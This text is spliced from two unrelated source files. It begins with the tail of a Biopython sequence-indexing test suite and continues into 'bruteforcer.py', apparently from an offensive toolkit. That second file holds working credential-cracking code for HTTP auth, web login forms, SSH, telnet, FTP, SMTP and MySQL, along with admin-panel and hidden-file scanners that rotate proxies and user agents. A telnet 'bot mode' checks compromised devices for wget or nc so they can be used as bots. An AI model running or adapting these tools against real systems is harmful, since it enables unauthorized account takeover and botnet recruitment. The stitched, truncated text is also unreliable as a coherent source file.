                # Unknown magic number b'.diy' in SFF index header:
                # b'.diy1.00'
                warnings.simplefilter("ignore", BiopythonParserWarning)
            rec_dict = SeqIO.index(filename, fmt, key_function=self.add_prefix)
            self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
            rec_dict.close()

        if not sqlite3:
            return

        # In memory,
        rec_dict = SeqIO.index_db(
            ":memory:", [filename], fmt, key_function=self.add_prefix
        )
        self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
        # check error conditions
        with self.assertRaises(ValueError, msg=msg):
            SeqIO.index_db(":memory:", format="dummy", key_function=self.add_prefix)
        with self.assertRaises(ValueError, msg=msg):
            SeqIO.index_db(
                ":memory:", filenames=["dummy"], key_function=self.add_prefix
            )
        rec_dict.close()

        # Saving to file...
        index_tmp = filename + ".key.idx"
        if os.path.isfile(index_tmp):
            os.remove(index_tmp)
        rec_dict = SeqIO.index_db(
            index_tmp, [filename], fmt, key_function=self.add_prefix
        )
        self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
        rec_dict.close()
        rec_dict._con.close()  # hack for PyPy

        # Now reload it...
        rec_dict = SeqIO.index_db(
            index_tmp, [filename], fmt, key_function=self.add_prefix
        )
        self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
        rec_dict.close()
        rec_dict._con.close()  # hack for PyPy

        # Now reload without passing filenames and format
        rec_dict = SeqIO.index_db(
            index_tmp, key_function=self.add_prefix
        )
        self.check_dict_methods(rec_dict, key_list, id_list, msg=msg)
        rec_dict.close()
        rec_dict._con.close()  # hack for PyPy
        os.remove(index_tmp)
        # Done

    def get_raw_check(self, filename, fmt, comp):
        """Check get_raw returns the exact on-disk bytes for each record."""
        # Also checking the key_function here
        msg = "Test failure parsing file %s with format %s" % (filename, fmt)
        if comp:
            with gzip.open(filename, "rb") as handle:
                raw_file = handle.read()
            mode = "r" + self.get_mode(fmt)
            with gzip.open(filename, mode) as handle:
                id_list = [rec.id.lower() for rec in SeqIO.parse(handle, fmt)]
        else:
            with open(filename, "rb") as handle:
                raw_file = handle.read()
            id_list = [rec.id.lower() for rec in SeqIO.parse(filename, fmt)]

        if fmt in ["sff"]:
            # SFF files with odd indexes emit parser warnings; suppress them.
            with warnings.catch_warnings():
                warnings.simplefilter("ignore", BiopythonParserWarning)
                rec_dict = SeqIO.index(filename, fmt, key_function=str.lower)
                if sqlite3:
                    rec_dict_db = SeqIO.index_db(
                        ":memory:", filename, fmt, key_function=str.lower,
                    )
        else:
            rec_dict = SeqIO.index(filename, fmt, key_function=str.lower)
            if sqlite3:
                rec_dict_db = SeqIO.index_db(
                    ":memory:", filename, fmt, key_function=str.lower,
                )

        self.assertEqual(set(id_list), set(rec_dict), msg=msg)
        if sqlite3:
            self.assertEqual(set(id_list), set(rec_dict_db), msg=msg)
        self.assertEqual(len(id_list), len(rec_dict), msg=msg)
        for key in id_list:
            self.assertIn(key, rec_dict, msg=msg)
            self.assertEqual(key, rec_dict[key].id.lower(), msg=msg)
            self.assertEqual(key, rec_dict.get(key).id.lower(), msg=msg)
            raw = rec_dict.get_raw(key)
            self.assertIsInstance(raw, bytes, msg=msg)
            self.assertTrue(raw.strip(), msg=msg)
            self.assertIn(raw, raw_file, msg=msg)

            if sqlite3:
                raw_db = rec_dict_db.get_raw(key)
                # Via index using format-specific get_raw which scans the file,
                # Via index_db in general using raw length found when indexing.
                self.assertEqual(raw, raw_db, msg=msg)

            rec1 = rec_dict[key]
            # Following isn't very elegant, but it lets me test the
            # __getitem__ SFF code is working.
            mode = self.get_mode(fmt)
            if mode == "b":
                handle = BytesIO(raw)
            elif mode == "t":
                handle = StringIO(raw.decode())
            else:
                raise RuntimeError("Unexpected mode %s" % mode)
            if fmt == "sff":
                rec2 = SeqIO.SffIO._sff_read_seq_record(
                    handle,
                    rec_dict._proxy._flows_per_read,
                    rec_dict._proxy._flow_chars,
                    rec_dict._proxy._key_sequence,
                    alphabet=None,
                    trim=False,
                )
            elif fmt == "sff-trim":
                rec2 = SeqIO.SffIO._sff_read_seq_record(
                    handle,
                    rec_dict._proxy._flows_per_read,
                    rec_dict._proxy._flow_chars,
                    rec_dict._proxy._key_sequence,
                    alphabet=None,
                    trim=True,
                )
            elif fmt == "uniprot-xml":
                self.assertTrue(raw.startswith(b"<entry "), msg=msg)
                self.assertTrue(raw.endswith(b"</entry>"), msg=msg)
                # Currently the __getitem__ method uses this
                # trick too, but we hope to fix that later
                raw = (
                    """<?xml version='1.0' encoding='UTF-8'?>
<uniprot xmlns="http://uniprot.org/uniprot"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://uniprot.org/uniprot
http://www.uniprot.org/support/docs/uniprot.xsd">
%s
</uniprot>
"""
                    % raw.decode()
                )
                handle = StringIO(raw)
                rec2 = SeqIO.read(handle, fmt)
            else:
                rec2 = SeqIO.read(handle, fmt)
            self.assertEqual(True, compare_record(rec1, rec2))
        rec_dict.close()
        del rec_dict

    if sqlite3:

        def test_duplicates_index_db(self):
            """Index file with duplicate identifiers with Bio.SeqIO.index_db()."""
            self.assertRaises(
                ValueError, SeqIO.index_db, ":memory:", ["Fasta/dups.fasta"], "fasta"
            )

    def test_duplicates_index(self):
        """Index file with duplicate identifiers with Bio.SeqIO.index()."""
        self.assertRaises(ValueError, SeqIO.index, "Fasta/dups.fasta", "fasta")

    def test_duplicates_to_dict(self):
        """Index file with duplicate identifiers with Bio.SeqIO.to_dict()."""
        with open("Fasta/dups.fasta") as handle:
            iterator = SeqIO.parse(handle, "fasta")
            self.assertRaises(ValueError, SeqIO.to_dict, iterator)

    def test_simple_checks(self):
        # Run simple_check for every fixture, plus its .bgz twin if present.
        for filename1, fmt in self.tests:
            assert fmt in _FormatToRandomAccess
            tasks = [(filename1, None)]
            if os.path.isfile(filename1 + ".bgz"):
                tasks.append((filename1 + ".bgz", "bgzf"))
            for filename2, comp in tasks:
                self.simple_check(filename2, fmt, comp)

    def test_key_checks(self):
        # Run key_check for every fixture, plus its .bgz twin if present.
        for filename1, fmt in self.tests:
            assert fmt in _FormatToRandomAccess
            tasks = [(filename1, None)]
            if os.path.isfile(filename1 + ".bgz"):
                tasks.append((filename1 + ".bgz", "bgzf"))
            for filename2, comp in tasks:
                self.key_check(filename2, fmt, comp)

    def test_raw_checks(self):
        # Run get_raw_check for every fixture, plus its .bgz twin if present.
        for filename1, fmt in self.tests:
            assert fmt in _FormatToRandomAccess
            tasks = [(filename1, None)]
            if os.path.isfile(filename1 + ".bgz"):
                tasks.append((filename1 + ".bgz", "bgzf"))
            for filename2, comp in tasks:
                self.get_raw_check(filename2, fmt, comp)
class IndexOrderingSingleFile(unittest.TestCase):
    """Record order from one FASTA file must survive every indexing route."""

    f = "GenBank/NC_000932.faa"
    ids = [record.id for record in SeqIO.parse(f, "fasta")]

    def test_order_to_dict(self):
        """Check to_dict preserves order in indexed file."""
        mapping = SeqIO.to_dict(SeqIO.parse(self.f, "fasta"))
        self.assertEqual(self.ids, list(mapping))

    def test_order_index(self):
        """Check index preserves order in indexed file."""
        mapping = SeqIO.index(self.f, "fasta")
        self.assertEqual(self.ids, list(mapping))

    if sqlite3:

        def test_order_index_db(self):
            """Check index_db preserves ordering indexed file."""
            mapping = SeqIO.index_db(":memory:", [self.f], "fasta")
            self.assertEqual(self.ids, list(mapping))
if sqlite3:

    class IndexOrderingManyFiles(unittest.TestCase):
        """Record order across several indexed files must be kept."""

        def test_order_index_db(self):
            """Check index_db preserves order in multiple indexed files."""
            fasta_files = ["GenBank/NC_000932.faa", "GenBank/NC_005816.faa"]
            expected_ids = []
            for fasta in fasta_files:
                expected_ids.extend(record.id for record in SeqIO.parse(fasta, "fasta"))
            indexed = SeqIO.index_db(":memory:", fasta_files, "fasta")
            self.assertEqual(expected_ids, list(indexed))
if __name__ == "__main__":
    # Verbosity 2 reports each test name/docstring as it executes.
    runner = unittest.TextTestRunner(verbosity=2)
    unittest.main(testRunner=runner)
|
bruteforcer.py | import requests,random,smtplib,telnetlib,sys,os,hashlib,base64,subprocess,time,xtelnet,os,threading#,requests_ntlm
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from ftplib import FTP
from .payloads import *
if os.path.isdir('/data/data')==True:
adr=True
if os.path.isdir('/data/data/com.termux/')==True:
termux=True
import mysqlcp
from .pager import *
from .wp import wpadmin
from .hasher import *
from .pager import *
class http_auth_bruteforce:
    # Threaded brute forcer for HTTP Basic/Digest authentication.
    # A background thread walks word_list ("user:pass" strings) and records
    # the first working pair in self.result as {url: "user:pass"}.
    __slots__=["logs","stop","finish","result"]

    def __init__(self,u,word_list=[],threads_daemon=True,logs=True,domain=None,proxy=None,proxies=None,cookie=None,user_agent=None,timeout=10):
        # NOTE(review): word_list=[] is a shared mutable default; callers are
        # expected to always pass their own list -- confirm before changing.
        self.stop=False      # set True externally to abort the attack
        self.logs=logs
        self.finish=False    # set True when the worker thread terminates
        self.result={}
        t=threading.Thread(target=self.crack,args=(u,domain,word_list,logs,proxy,proxies,cookie,user_agent,timeout,))
        t.daemon=threads_daemon
        t.start()

    def done(self):
        # Poll whether the background attack has terminated.
        return self.finish

    def crack(self,u,domain,word_list,logs,proxy,proxies,cookie,user_agent,timeout):
        # Worker: detect the server's auth scheme, then try each combo.
        if user_agent:
            us=user_agent
        else:
            us=random.choice(ua)  # random User-Agent from the payloads module
        hed={"User-Agent":us}
        if cookie:
            hed.update({"Cookie":cookie})
        prox=None
        if proxy:
            prox={'http':'http://'+proxy,'https':'http://'+proxy}
        if proxies:
            # `proxies` (a rotating pool) takes precedence over `proxy`.
            prox=random.choice(proxies)
            prox={'http':'http://'+prox,'https':'http://'+prox}
        try:
            if self.logs==True:
                print("[*]Checking Authentication Type:")
            resp = requests.get(u,proxies=prox,headers=hed, verify=False, timeout=timeout)
            if 'basic' in resp.headers['WWW-Authenticate'].lower():
                if self.logs==True:
                    print("==>Basic")
                auth_type = requests.auth.HTTPBasicAuth
            elif 'digest' in resp.headers['WWW-Authenticate'].lower():
                if self.logs==True:
                    print("==>Digest")
                auth_type = requests.auth.HTTPDigestAuth
                # Disabled NTLM support (needs requests_ntlm), kept as an
                # inert string statement:
                """elif 'ntlm' in resp.headers['WWW-Authenticate'].lower():
                if self.logs==True:
                print("==>Ntlm")
                auth_type = requests_ntlm.HttpNtlmAuth
                if not domain:
                raise Exception('You need to specify a domain for "Ntlm" authentication !\n\nbane.http_auth_bruteforce("http://example.com",domain="example.com",.....)')"""
            else:
                if self.logs==True:
                    print("==>Unknown type")
                self.finish=True
                return
        except:
            # Missing WWW-Authenticate header or network failure:
            # treat the target as unsupported and bail out.
            if self.logs==True:
                print("bane doesn't support this type of authentication")
            self.finish=True
            return
        for x in word_list:
            try:
                if self.stop==True:
                    self.finish=True
                    break
                username=x.split(":")[0]
                """if domain and auth_type==requests_ntlm.HttpNtlmAuth:
                username=domain+'\\'+username"""
                password=x.split(":")[1]
                if self.logs==True:
                    print("[*]Trying: {} {}".format(username,password))
                # Re-pick proxy and UA per attempt (rotation).
                prox=None
                if proxy:
                    prox={'http':'http://'+proxy}
                if proxies:
                    prox=random.choice(proxies)
                    prox={'http':'http://'+prox}
                if user_agent:
                    us=user_agent
                else:
                    us=random.choice(ua)
                hed={"User-Agent":us}
                if cookie:
                    hed.update({"Cookie":cookie})
                r=requests.get(u, auth=auth_type(username,password),proxies=prox,headers=hed, verify=False, timeout=timeout)
                # Heuristic: HTTP 200 with none of the common failure words.
                if (r.status_code == 200)and("required" not in r.text.lower())and("wrong" not in r.text.lower())and("invalid" not in r.text.lower())and("denied" not in r.text.lower())and("unauthorized" not in r.text.lower()):
                    if self.logs==True:
                        print("[+]Success")
                    self.result={u:username+":"+password}
                    self.finish=True
                    break
                else:
                    if self.logs==True:
                        print("[-]Fail")
            except Exception as ex:
                # Network errors on one attempt count as a failure only.
                if self.logs==True:
                    print("[-]Fail")
        self.finish=True
def access(u,timeout=10,user_agent=None,cookie=None,bypass=False,proxy=None):
    """
    Check whether a URL is directly reachable: HTTP 200 without a
    redirect and without the usual error-page markers in the body.

    u          : target URL
    timeout    : request timeout in seconds (default 10)
    user_agent : fixed User-Agent (default: random choice from `ua`)
    cookie     : optional Cookie header value
    bypass     : append '#' to the URL (naive filter bypass)
    proxy      : "host:port" HTTP proxy

    Returns True when the page appears accessible, False otherwise
    (including on any network error).
    """
    if bypass==True:
        u+='#'
    if user_agent:
        us=user_agent
    else:
        us=random.choice(ua)
    hed={'User-Agent': us}
    if cookie:
        hed.update({"Cookie":cookie})
    if proxy:
        proxy={'http':'http://'+proxy,'https':'http://'+proxy}
    try:
        # Bug fix: the carefully built `hed` (incl. Cookie and the chosen
        # User-Agent) was previously discarded and a fresh random UA sent.
        r=requests.get(u, headers = hed , allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
        if r.status_code == requests.codes.ok:
            # Bug fix: was `or`, which is true whenever either marker is
            # absent (i.e. almost always); `and` matches the equivalent
            # check in filemanager_finder.
            if ("Uncaught exception" not in r.text) and ("404 Not Found" not in r.text):
                return True
    except Exception as e:
        pass
    return False
class web_login_bruteforce:
    # Threaded brute forcer for HTML login forms: fetches the page, fills
    # the login form detected by set_login_form, and judges success by
    # whether a login form can still be parsed from the response.
    __slots__=["stop","finish","result","logs"]

    def try_combo(self,url,username,password,cookie,user_agent,proxy,timeout):
        # Attempt a single username/password pair; True on apparent success.
        prox=None  # NOTE(review): assigned but never used below -- confirm dead.
        if proxy:
            proxy={'http':'http://'+proxy,'https':'http://'+proxy}
        cookies=None
        h={"User-Agent":user_agent}
        if cookie:
            h.update({"Cookie":cookie})
            cookies=cookie
        try:
            r=requests.get(url,proxies=proxy,headers=h, verify=False, timeout=timeout)
        except:
            return False
        cook=None
        try:
            cook=r.headers['Set-cookie']
        except:
            pass
        # Merge the server-set cookies with the caller-supplied cookie.
        cookies=set_correct_cookies(cook,cookie=cookie)
        form=set_login_form(url, r.text.encode('utf-8','ignore'), username, password)
        h={"User-Agent":user_agent}
        if cookies:
            h.update({"Cookie":cookies})
        d=form[0]
        # Referer/Origin headers mimic a genuine browser form submission.
        h.update({"Referer":form[1],"Origin":form[1].split("://")[0]+"://"+form[1].split("://")[1].split("/")[0]})
        try:
            r=requests.post(form[1],data=d,headers=h,verify=False,proxies=proxy, timeout=timeout)
        except:
            return False
        try:
            # If a login form can still be parsed, the login failed;
            # set_login_form raising is taken as "form gone" => success.
            set_login_form(url, r.text.encode('utf-8','ignore'), username, password)
            return False
        except:
            return True

    def __init__(self,u,word_list=[],threads_daemon=True,logs=True,proxy=None,proxies=None,cookie=None,user_agent=None,timeout=10):
        # NOTE(review): word_list=[] is a shared mutable default; callers are
        # expected to always pass their own list -- confirm before changing.
        self.stop=False      # set True externally to abort the attack
        self.finish=False    # set True when the worker thread terminates
        self.logs=logs
        self.result={}
        t=threading.Thread(target=self.crack,args=(u,word_list,logs,proxy,proxies,cookie,user_agent,timeout,))
        t.daemon=threads_daemon
        t.start()

    def done(self):
        # Poll whether the background attack has terminated.
        return self.finish

    def crack(self,u,word_list,logs,proxy,proxies,cookie,user_agent,timeout):
        # Worker: try each "user:pass" entry until one succeeds or stop is set.
        for x in word_list:
            try:
                if self.stop==True:
                    self.finish=True
                    break
                username=x.split(":")[0]
                password=x.split(":")[1]
                if self.logs==True:
                    print("[*]Trying: {} {}".format(username,password))
                if user_agent:
                    us=user_agent
                else:
                    us=random.choice(ua)
                prox=None
                if proxy:
                    prox=proxy
                if proxies:
                    prox=random.choice(proxies)
                if self.try_combo(u,username,password,cookie,us,prox,timeout)==True:
                    if self.logs==True:
                        print("[+]Success")
                    self.result={u:username+":"+password}
                    self.finish=True
                    break
                else:
                    if self.logs==True:
                        print("[-]Fail")
            except Exception as e:
                pass
        # NOTE(review): this prints "[-]Fail" even when the loop broke on
        # success; the original (whitespace-mangled) indentation is
        # ambiguous -- confirm intended placement.
        if self.logs==True:
            print("[-]Fail")
        self.finish=True
class filemanager_finder:
    # Threaded scanner probing a site for exposed file-manager panels by
    # appending each path from `manager` (payloads module) to the base URL.
    __slots__=["logs","stop","finish","result"]

    def __init__(self,u,logs=True,threads_daemon=True,user_agent=None,cookie=None,timeout=10,proxy=None,proxies=None):
        '''
        u: the link: http://www.example.com
        logs: (set by default to True) show the process and requests
        timeout: (set by default to 10) timeout flag for the requests
        usage:
         >>>import bane
         >>>url='http://www.example.com/'
         >>>bane.filemanager_finder(url)
        The scan runs on a background thread; poll done() and read
        self.result ({base_url: found_link}) when it is True.
        '''
        self.logs=logs
        self.stop=False      # set True externally to abort the scan
        self.finish=False    # set True when the worker thread terminates
        self.result={}
        t=threading.Thread(target=self.crack,args=(u,logs,user_agent,cookie,timeout,proxy,proxies,))
        t.daemon=threads_daemon
        t.start()

    def crack(self,u,logs,user_agent,cookie,timeout,proxy,proxies):
        # Bug fix: the fixed proxy is normalised ONCE. Previously the
        # `proxy` parameter was rebuilt into a dict inside the loop, so on
        # the second iteration 'http://'+<dict> raised TypeError outside
        # any try block and silently killed the thread.
        fixed_proxy=None
        if proxy:
            fixed_proxy={'http':'http://'+proxy,'https':'http://'+proxy}
        for i in manager:
            if self.stop==True:
                self.finish=True
                break
            prox=fixed_proxy
            if proxies:
                # Rotate through the proxy pool on every attempt.
                prx=random.choice(proxies)
                prox={'http':'http://'+prx,'https':'http://'+prx}
            if user_agent:
                us=user_agent
            else:
                us=random.choice(ua)
            hed={'User-Agent': us}
            if cookie:
                hed.update({"Cookie":cookie})
            try:
                if u[len(u)-1]=='/':
                    u=u[0:len(u)-1]
                g=u+i
                r=requests.get(g, headers = hed , allow_redirects=False,proxies=prox,timeout=timeout, verify=False)
                if r.status_code == requests.codes.ok:
                    if ("Uncaught exception" not in r.text) and ("404 Not Found" not in r.text) and ('could not be found' not in r.text):
                        self.finish=True
                        if self.logs==True:
                            # Bug fix: progress was looked up via
                            # manager.index(g) -- g is the full URL, never in
                            # `manager`, so ValueError was raised and swallowed
                            # by the broad except, skipping result.update and
                            # the break. Use the payload path `i` instead.
                            sys.stdout.write("\rStats: {}/{} | Found: {}          ".format(manager.index(i),len(manager),self.finish))
                            sys.stdout.flush()
                        self.result.update({u:g})
                        break
                    else:
                        if self.logs==True:
                            sys.stdout.write("\rStats: {}/{} | Found: {}          ".format(manager.index(i),len(manager),self.finish))
                            sys.stdout.flush()
                else:
                    if self.logs==True:
                        sys.stdout.write("\rStats: {}/{} | Found: {}          ".format(manager.index(i),len(manager),self.finish))
                        sys.stdout.flush()
            except KeyboardInterrupt:
                break
            except Exception as e:
                pass
        self.finish=True

    def done(self):
        # Poll whether the background scan has terminated.
        return self.finish
class force_browsing:
    '''
    Uses the "Forced Browsing" technique: tries to reach restricted areas
    without credentials by guessing link names under the given URL.

    u: link leading to the control panel directory, e.g. for
       http://www.example.com/admin/login.php
       drop 'login.php' and pass the rest:
       >>>import bane
       >>>bane.force_browsing('http://www.example.com/admin/')
       the class will then try to find possibly accessible links such as:
       http://www.example.com/admin/edit.php
       http://www.example.com/admin/news.php
       http://www.example.com/admin/home.php
    timeout: (default 10) timeout flag for the request
    logs: (default True) show the attack progress; set False to silence
    ext: (default "php") extension appended to each candidate; only
         "php", "asp" and "aspx" wordlists exist (others are not used).
    Results end up in self.result as {base_url: [accessible links]}.
    '''
    __slots__=["stop","finish","result","logs"]
    def __init__(self,u,timeout=10,threads_daemon=True,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
        self.stop=False
        self.finish=False
        self.result={}
        self.logs=logs
        t=threading.Thread(target=self.crack,args=(u,timeout,logs,ext,user_agent,cookie,proxy,proxies,))
        t.daemon=threads_daemon
        t.start()
    def crack(self,u,timeout=10,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
        """Worker thread: probe u+<word>.<ext> for every word in `innerl`.

        NOTE(review): `timeout` is accepted but never forwarded to
        access() — confirm whether access() should receive it.
        """
        found=[]
        if u[len(u)-1]=='/':
            u=u[0:len(u)-1]
        for word in innerl:
            if self.stop==True:
                break
            target=u+word+'.'+ext
            if self.logs==True:
                print("[*]Trying:",target)
            try:
                if proxies:
                    # BUG FIX: original read `proxyrandom.choice(proxies)`
                    # (missing '='), raising NameError whenever a proxy
                    # list was supplied.
                    proxy=random.choice(proxies)
                if user_agent:
                    us=user_agent
                else:
                    us=random.choice(ua)
                ok=access(target,user_agent=us,cookie=cookie,proxy=proxy)
            except KeyboardInterrupt:
                break
            except Exception:
                # Treat transport errors as "not accessible" instead of
                # letting them kill the worker thread (which left
                # self.finish False forever).
                ok=False
            if ok==True:
                found.append(target)
                if self.logs==True:
                    print("[+]FOUND!!!")
            else:
                if self.logs==True:
                    print("[-]Failed")
        self.result={u:found}
        self.finish=True
    def done(self):
        """Return True once the worker thread has terminated."""
        return self.finish
class admin_panel_finder:
    '''
    Probes a site with a list of possible admin-panel links for the chosen
    extension: php, asp, aspx, js, /, cfm, cgi, brf or html.
    ext: (default: 'php') the link extension to try.
    Results end up in self.result as {base_url: [found links]}.
    usage:
    >>>import bane
    >>>bane.admin_panel_finder('http://www.example.com',ext='php',timeout=7)
    >>>bane.admin_panel_finder('http://www.example.com',ext='aspx',timeout=5)
    '''
    __slots__=["stop","finish","result","logs"]
    def __init__(self,u,logs=True,threads_daemon=True,user_agent=None,cookie=None,ext='php',timeout=10,proxy=None,proxies=None):
        self.logs=logs
        self.stop=False
        self.finish=False
        self.result={}
        t=threading.Thread(target=self.crack,args=(u,timeout,logs,ext,user_agent,cookie,proxy,proxies,))
        t.daemon=threads_daemon
        t.start()
    def crack(self,u,timeout=10,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
        """Worker thread: GET u+<path> for every path in the wordlist
        matching `ext`; collect every 200 response."""
        links=[]
        # Lazy dispatch (no dict) so unknown extensions simply yield an
        # empty wordlist without touching the module-level lists.
        e=ext.strip().lower()
        if e=="php":
            links=phpl
        elif e=="asp":
            links=aspl
        elif e=="aspx":
            links=aspxl
        elif e=="js":
            links=jsl
        elif e=="/":
            links=slashl
        elif e=="cfm":
            links=cfml
        elif e=="cgi":
            links=cgil
        elif e=="brf":
            links=brfl
        elif e=="html":
            links=htmll
        hits=[]
        # Normalize once, before the loop. The original re-wrapped `proxy`
        # into a dict every iteration: from the 2nd pass 'http://'+dict
        # raised TypeError, silently reported as "[-]Failed" for every
        # remaining request.
        if proxy:
            proxy={'http':'http://'+proxy,'https':'http://'+proxy}
        if u[len(u)-1]=='/':
            u=u[0:len(u)-1]
        for path in links:
            if self.stop==True:
                break
            try:
                prx=proxy
                if proxies:
                    pick=random.choice(proxies)
                    prx={'http':'http://'+pick,'https':'http://'+pick}
                if user_agent:
                    us=user_agent
                else:
                    us=random.choice(ua)
                hed={'User-Agent': us}
                if cookie:
                    hed.update({"Cookie":cookie})
                g=u+path
                if self.logs==True:
                    print("[*]Trying:",g)
                r=requests.get(g,headers = hed,allow_redirects=False,proxies=prx,timeout=timeout, verify=False)
                if r.status_code == requests.codes.ok:
                    if self.logs==True:
                        print("[+]FOUND!!!")
                    hits.append(g)
                else:
                    if self.logs==True:
                        print("[-]failed")
            except KeyboardInterrupt:
                break
            except Exception:
                if self.logs==True:
                    print ("[-]Failed")
        self.result={u:hits}
        self.finish=True
    def done(self):
        """Return True once the worker thread has terminated."""
        return self.finish
'''
the next functions are used to check the login credentials you provide, it can be used for bruteforce attacks.
it returns True if the given login credentials are valid, else it returns False.
example:
>>>host='125.33.32.11'
>>>wordlist=['admin:admin','admin123:admin','user:password']
>>>for x in wordlist:
user=x.split(':')[0]
pwd=x.split(':')[1]
print '[*]Trying:',user,pwd
if bane.telnet(host,username=user,password=pwd)==True:
print'[+]Found!!!'
else:
print'[-]Failed'
'''
def smtp(u, username,password,p=25,ehlo=True,helo=False,ttls=False):
    """Check SMTP credentials against host `u`:`p`.

    ehlo/helo: which greeting(s) to send before authenticating.
    ttls: issue STARTTLS before logging in.
    Returns True if login succeeds, False on any failure (best-effort:
    all exceptions are treated as "invalid credentials / unreachable").
    """
    try:
        s= smtplib.SMTP(u, p)#connect to smtp server
        if ehlo==True:
            s.ehlo()
        if helo==True:
            s.helo()
        if ttls==True:
            # BUG FIX: the original called starttls() twice (before and
            # after helo); the second call raises SMTPException once TLS
            # is active, turning every ttls login into a false negative.
            s.starttls()
        s.login(username, password)
        return True
    except Exception:
        pass
    return False
def telnet(u,username,password,p=23,timeout=5,bot_mode=False):
    """Validate telnet credentials on host `u`:`p`.

    bot_mode: additionally run `busybox` on the remote shell and only
    report True when the output mentions wget or nc (i.e. the box looks
    usable as a bot).
    Returns False on any connection/login failure.
    """
    try:
        sess=xtelnet.session()
        sess.connect(u,username=username,password=password,p=p,timeout=timeout)
        if not bot_mode:
            sess.destroy()
            return True
        banner=sess.execute('busybox')
        sess.destroy()
        return ("wget" in banner) or ("nc" in banner)
    except:
        pass
    return False
#why i used this code for ssh brute force instead of: pexpext/paramiko ? Well pexpect doesn't work on non-linux machines and paramiko gives a huuuuge number of false positive results ! you will see, with this code there is no false positive brute force ;)
def ssh(u,username,password,p=22,timeout=5,exchange_key=None):
    """Validate SSH credentials by driving the platform's ssh client
    (plink on Windows, sshpass+ssh elsewhere) and parsing its stderr.

    exchange_key: a HostKeyAlgorithms value to retry with when the server
    rejects the default key exchange (non-Windows only).
    Returns True when authentication succeeded, False otherwise.
    NOTE(review): the password is placed on the command line, which is
    visible in the process list — confirm this is acceptable here.
    """
    if os.name == 'nt':
        if exchange_key!=None:#this doesn't work on windows for some reason :(
            return False
        # "hvbjkjk" is a deliberately bogus remote command: auth success is
        # detected from the error text, not from running anything.
        l='echo y | plink -ssh -l {} -pw {} {} -P {} "hvbjkjk"'.format(username,password,u,p)
        sshp = subprocess.Popen(l.split(),stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)
    else:
        if exchange_key:
            key="-oHostKeyAlgorithms=+"+exchange_key
        else:
            key=""
        l="sshpass -p {} ssh {} -p {} -o StrictHostKeyChecking=no -l {} {} 'exithg'".format(password,key,p,username,u) #we use the sshpass command to send the password
        sshp = subprocess.Popen(l.split(),stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    # Poll the child; give up after ~`timeout` seconds.
    ti=time.time()
    while sshp.poll() is None:
        time.sleep(.1)
        #print(ssh.stdout.readlines())
        if int(time.time()-ti)==timeout:
            try:
                sshp.kill()
            except:
                pass
            return False
    # ou = (stdout, stderr); all verdicts below are read from stderr.
    ou=sshp.communicate()
    try:
        sshp.kill()
    except:
        pass
    time.sleep(0.1)
    if exchange_key==None:
        if "Their offer:" in ou[1].decode("utf-8") :
            if os.name == 'nt':
                return False
            # Server rejected our kex; retry once with its offered algorithm.
            k=ou[1].decode("utf-8").split("offer:")[1].strip()
            return ssh(u,username,password,p=p,timeout=timeout,exchange_key=k)
    if "Server refused to start a shell/command" in ou[1].decode("utf-8"):
        # Auth worked even though no shell was granted.
        return True
    if (( "unsupported" in ou[1].decode("utf-8").lower() )or( "denied" in ou[1].decode("utf-8").lower() )or("FATAL ERROR" in ou[1].decode("utf-8")) or ("refused" in ou[1].decode("utf-8").lower()) or ("Unsupported KEX algorithm" in ou[1].decode("utf-8")) or ("Bad SSH2 KexAlgorithms" in ou[1].decode("utf-8")) ):
        return False
    else:
        return True
def ftp_anon(ip,timeout=5):
    """Return True if the FTP server at `ip` accepts anonymous login."""
    try:
        FTP(ip,timeout=timeout).login()
    except Exception:
        return False
    return True
def ftp(ip,username,password,timeout=5):
    """Check FTP credentials against host `ip`.

    Returns True when login succeeds, False on any failure.
    """
    try:
        # (original assigned an unused local `i=False` here — removed)
        ftp = FTP(ip,timeout=timeout)
        ftp.login(username,password)
        return True
    except Exception:
        pass
    return False
def mysql(u,username,password,timeout=5,p=3306):
    """Check MySQL credentials against host `u`:`p`.

    Returns True when a session can be opened with them, False otherwise.
    """
    try:
        conn=mysqlcp.session(u,username,password,timeout=timeout,port=p)
        conn.destroy()
        return True
    except Exception:
        return False
class hydra:
    '''
    hydra-like credential bruteforcer over several protocols.
    protocol: one of "ftp", "ssh", "telnet", "smtp", "mysql" or "wp"
              (don't forget to set the matching port via `p`).
    word_list: iterable of "user:password" strings.
    The first working pair is stored in self.result as
    {target: "user:password"} ('' when nothing matched).
    user_agent/cookie: only used by the "wp" protocol (new optional
    keyword arguments; previously the wp branch crashed on them).
    '''
    __slots__=["stop","finish","result","logs"]
    def __init__(self,u,p=22,protocol="ssh",word_list=None,threads_daemon=True,logs=True,exchange_key=None,timeout=5,ehlo=False,helo=True,ttls=False,proxy=None,proxies=None,user_agent=None,cookie=None):
        # word_list default changed from a shared mutable [] to None;
        # observable behavior is identical.
        if word_list is None:
            word_list=[]
        self.logs=logs
        self.stop=False
        self.finish=False
        self.result={}
        t=threading.Thread(target=self.crack,args=(u,p,protocol,word_list,logs,exchange_key,timeout,ehlo,helo,ttls,proxy,proxies,user_agent,cookie,))
        t.daemon=threads_daemon
        t.start()
    def crack(self,u,p,protocol,word_list,logs,exchange_key,timeout,ehlo,helo,ttls,proxy,proxies,user_agent=None,cookie=None):
        """Worker thread: try each user:pwd pair until one succeeds."""
        o=''
        # Lazy dispatch: only the matching checker name is ever touched.
        s=None
        if protocol=="telnet":
            s=telnet
        elif protocol=="ssh":
            s=ssh
        elif protocol=="ftp":
            s=ftp
        elif protocol=="smtp":
            s=smtp
        elif protocol=="mysql":
            s=mysql
        elif protocol=="wp":
            s=wpadmin
        if s is None:
            # BUG FIX: with an unknown protocol the original left `s`
            # unbound and raised UnboundLocalError per word; finish
            # gracefully with an empty result instead.
            if self.logs==True:
                print("[-]Unknown protocol: "+str(protocol))
            self.result={u:o}
            self.finish=True
